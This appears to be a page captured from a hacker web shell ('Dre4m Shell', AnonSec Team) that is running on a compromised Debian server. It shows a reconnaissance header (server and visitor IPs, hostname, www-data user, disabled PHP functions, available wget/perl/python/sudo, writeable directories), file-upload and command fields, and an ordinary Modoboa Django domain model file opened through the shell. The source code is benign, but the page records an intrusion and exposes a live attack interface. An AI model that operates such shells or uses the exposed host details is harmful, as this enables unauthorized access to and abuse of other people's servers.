Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.119.103.8
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib64/python3.5/site-packages/modoboa/admin/models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib64/python3.5/site-packages/modoboa/admin/models/domain.py
"""Models related to domains management."""

import datetime

from reversion import revisions as reversion

from django.db import models
from django.utils import timezone
from django.utils.encoding import (
    force_text, python_2_unicode_compatible, smart_text
)
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _, ugettext_lazy

from modoboa.core import signals as core_signals
from modoboa.core.models import User
from modoboa.lib.exceptions import BadRequest, Conflict
from modoboa.parameters import tools as param_tools
from .. import constants
from .base import AdminObject


@python_2_unicode_compatible
class Domain(AdminObject):
    """Mail domain."""

    name = models.CharField(ugettext_lazy("name"), max_length=100, unique=True,
                            help_text=ugettext_lazy("The domain name"))
    quota = models.PositiveIntegerField(
        default=0,
    )
    default_mailbox_quota = models.PositiveIntegerField(
        verbose_name=ugettext_lazy("Default mailbox quota"),
        default=0
    )
    enabled = models.BooleanField(
        ugettext_lazy("enabled"),
        help_text=ugettext_lazy("Check to activate this domain"),
        default=True
    )
    type = models.CharField(default="domain", max_length=20)  # NOQA:A003
    enable_dns_checks = models.BooleanField(
        ugettext_lazy("Enable DNS checks"), default=True,
        help_text=ugettext_lazy("Check to enable DNS checks for this domain")
    )

    transport = models.OneToOneField(
        "transport.Transport", null=True, on_delete=models.SET_NULL)

    enable_dkim = models.BooleanField(
        ugettext_lazy("Enable DKIM signing"),
        help_text=ugettext_lazy(
            "If you activate this feature, a DKIM key will be "
            "generated for this domain."),
        default=False
    )
    dkim_key_selector = models.CharField(max_length=30, default="modoboa")
    dkim_key_length = models.PositiveIntegerField(
        ugettext_lazy("Key length"), choices=constants.DKIM_KEY_LENGTHS,
        blank=True, null=True
    )
    dkim_public_key = models.TextField(blank=True)
    dkim_private_key_path = models.CharField(max_length=254, blank=True)

    class Meta:
        ordering = ["name"]
        app_label = "admin"

    def __init__(self, *args, **kwargs):
        """Save name for further use."""
        super(Domain, self).__init__(*args, **kwargs)
        self.old_mail_homes = None
        self.oldname = self.name
        self.old_dkim_key_length = self.dkim_key_length

    @property
    def domainalias_count(self):
        return self.domainalias_set.count()

    @property
    def mailbox_count(self):
        return self.mailbox_set.count()

    @property
    def mbalias_count(self):
        return self.alias_set.filter(internal=False).count()

    @property
    def identities_count(self):
        """Total number of identities in this domain."""
        return (
            self.mailbox_set.count() +
            self.alias_set.filter(internal=False).count())

    @property
    def tags(self):
        label = ""
        for dt in constants.DOMAIN_TYPES:
            if self.type == dt[0]:
                label = dt[1]
        result = [{"name": self.type, "label": label, "type": "dom"}]
        if self.transport:
            result.append({
                "name": self.transport.service,
                "label": self.transport.service,
                "type": "srv",
                "color": "info"
            })
        return result

    @property
    def admins(self):
        """Return the domain administrators of this domain.

        :return: a list of User objects
        """
        return User.objects.filter(
            is_superuser=False,
            objectaccess__content_type__model="domain",
            objectaccess__object_id=self.pk)

    @property
    def aliases(self):
        return self.domainalias_set

    @property
    def uses_a_reserved_tld(self):
        """Does this domain use a reserved TLD."""
        tld = self.name.split(".", 1)[-1]
        return tld in constants.RESERVED_TLD

    @property
    def just_created(self):
        """Return true if the domain was created in the latest 24h."""
        now = timezone.now()
        delta = datetime.timedelta(days=1)
        return self.creation + delta > now

    def awaiting_checks(self):
        """Return true if the domain has no valid MX record and was created
        in the latest 24h."""
        if (not self.mxrecord_set.has_valids()) and self.just_created:
            return True
        return False

    @cached_property
    def dnsbl_status_color(self):
        """Shortcut to DNSBL results."""
        if not self.dnsblresult_set.exists():
            return "warning"
        elif self.dnsblresult_set.blacklisted().exists():
            return "danger"
        else:
            return "success"

    @cached_property
    def spf_record(self):
        """Return SPF record."""
        return self.dnsrecord_set.filter(type="spf").first()

    @cached_property
    def dkim_record(self):
        """Return DKIM record."""
        return self.dnsrecord_set.filter(type="dkim").first()

    @cached_property
    def dmarc_record(self):
        """Return DMARC record."""
        return self.dnsrecord_set.filter(type="dmarc").first()

    @cached_property
    def autoconfig_record(self):
        """Return autoconfig record."""
        return self.dnsrecord_set.filter(type="autoconfig").first()

    @cached_property
    def autodiscover_record(self):
        """Return autodiscover record."""
        return self.dnsrecord_set.filter(type="autodiscover").first()

    @cached_property
    def allocated_quota(self):
        """Return current quota allocation."""
        if not self.quota:
            return 0
        if not self.mailbox_set.exists():
            return 0
        return self.mailbox_set.aggregate(
            total=models.Sum("quota"))["total"]

    @cached_property
    def allocated_quota_in_percent(self):
        """Return allocated quota in percent."""
        if not self.allocated_quota:
            return 0
        return int(self.allocated_quota / float(self.quota) * 100)

    @cached_property
    def used_quota(self):
        """Return current quota usage."""
        from .mailbox import Quota

        if not self.quota:
            return 0
        if not self.mailbox_set.exists():
            return 0
        return int(Quota.objects.get_domain_usage(self) / 1048576)

    @cached_property
    def used_quota_in_percent(self):
        """Return used quota in percent."""
        if not self.allocated_quota:
            return 0
        return int(self.used_quota / float(self.quota) * 100)

    @property
    def bind_format_dkim_public_key(self):
        """Return DKIM public key using Bind format."""
        record = "v=DKIM1;k=rsa;p=%s" % self.dkim_public_key
        # TXT records longer than 255 characters need split into chunks
        # split record into 74 character chunks (+2 for indent, +2 for quotes(")
        # == 78 characters) to make more readable in text editors.
        split_record = []
        while record:
            if len(record) > 74:
                split_record.append("  \"%s\"" % record[:74])
                record = record[74:]
            else:
                split_record.append("  \"%s\"" % record)
                break
        record = "\n".join(split_record)
        return "{}._domainkey.{}. IN TXT (\n{})".format(
            self.dkim_key_selector, self.name, record)

    def add_admin(self, account):
        """Add a new administrator to this domain.

        :param User account: the administrator
        """
        from modoboa.lib.permissions import grant_access_to_object

        core_signals.can_create_object.send(
            sender=self.__class__, context=self, object_type="domain_admins")
        grant_access_to_object(account, self)
        for mb in self.mailbox_set.all():
            if mb.user.has_perm("admin.add_domain"):
                continue
            grant_access_to_object(account, mb)
            grant_access_to_object(account, mb.user)
        for al in self.alias_set.all():
            grant_access_to_object(account, al)

    def remove_admin(self, account):
        """Remove an administrator of this domain.

        :param User account: administrator to remove
        """
        from modoboa.lib.permissions import ungrant_access_to_object

        ungrant_access_to_object(self, account)
        for mb in self.mailbox_set.all():
            if mb.user.has_perm("admin.add_domain"):
                continue
            ungrant_access_to_object(mb, account)
            ungrant_access_to_object(mb.user, account)
        for al in self.alias_set.all():
            ungrant_access_to_object(al, account)

    def save(self, *args, **kwargs):
        """Store current data if domain is renamed."""
        if self.oldname != self.name:
            self.old_mail_homes = {
                mb.id: mb.mail_home for mb in self.mailbox_set.all()
            }
        if self.old_dkim_key_length != self.dkim_key_length:
            self.dkim_public_key = ""
            self.dkim_private_key_path = ""
        super(Domain, self).save(*args, **kwargs)

    def delete(self, fromuser, keepdir=False):
        """Custom delete method."""
        from modoboa.lib.permissions import ungrant_access_to_objects
        from .mailbox import Quota

        if self.domainalias_set.count():
            ungrant_access_to_objects(self.domainalias_set.all())
        if self.alias_set.count():
            ungrant_access_to_objects(self.alias_set.all())
        if param_tools.get_global_parameter("auto_account_removal"):
            User.objects.filter(mailbox__domain=self).delete()
        elif self.mailbox_set.count():
            Quota.objects.filter(username__contains="@%s" % self.name).delete()
            ungrant_access_to_objects(self.mailbox_set.all())
        super(Domain, self).delete()

    def __str__(self):
        return smart_text(self.name)

    def from_csv(self, user, row):
        """Create a new domain from a CSV entry.

        The expected fields order is the following::

          "domain", name, quota, default_mailbox_quota, enabled

        :param ``core.User`` user: user creating the domain
        :param str row: a list containing domain's definition
        """
        from .. import lib

        if len(row) < 5:
            raise BadRequest(_("Invalid line"))
        self.name = row[1].strip().lower()
        if Domain.objects.filter(name=self.name).exists():
            raise Conflict
        domains_must_have_authorized_mx = (
            param_tools.get_global_parameter("domains_must_have_authorized_mx")
        )
        if domains_must_have_authorized_mx and not user.is_superuser:
            if not lib.domain_has_authorized_mx(self.name):
                raise BadRequest(
                    _("No authorized MX record found for domain {}")
                    .format(self.name)
                )
        try:
            self.quota = int(row[2].strip())
        except ValueError:
            raise BadRequest(
                _("Invalid quota value for domain '{}'")
                .format(self.name)
            )
        try:
            self.default_mailbox_quota = int(row[3].strip())
        except ValueError:
            raise BadRequest(
                _("Invalid default mailbox quota value for domain '{}'")
                .format(self.name)
            )
        if self.quota != 0 and self.default_mailbox_quota > self.quota:
            raise BadRequest(
                _("Default mailbox quota cannot be greater than domain "
                  "quota")
            )
        self.enabled = (row[4].strip().lower() in ["true", "1", "yes", "y"])
        core_signals.can_create_object.send(
            sender=self.__class__, context=user, klass=Domain,
            instance=self)
        self.save(creator=user)

    def to_csv(self, csvwriter):
        """Export domain and domain aliases to CSV format."""
        csvwriter.writerow([
            "domain",
            force_text(self.name),
            self.quota,
            self.default_mailbox_quota,
            self.enabled
        ])
        for dalias in self.domainalias_set.all():
            dalias.to_csv(csvwriter)

    def post_create(self, creator):
        """Post creation actions.

        :param ``User`` creator: user whos created this domain
        """
        super(Domain, self).post_create(creator)
        for domalias in self.domainalias_set.all():
            domalias.post_create(creator)


reversion.register(Domain)

Anon7 - 2022
AnonSec Team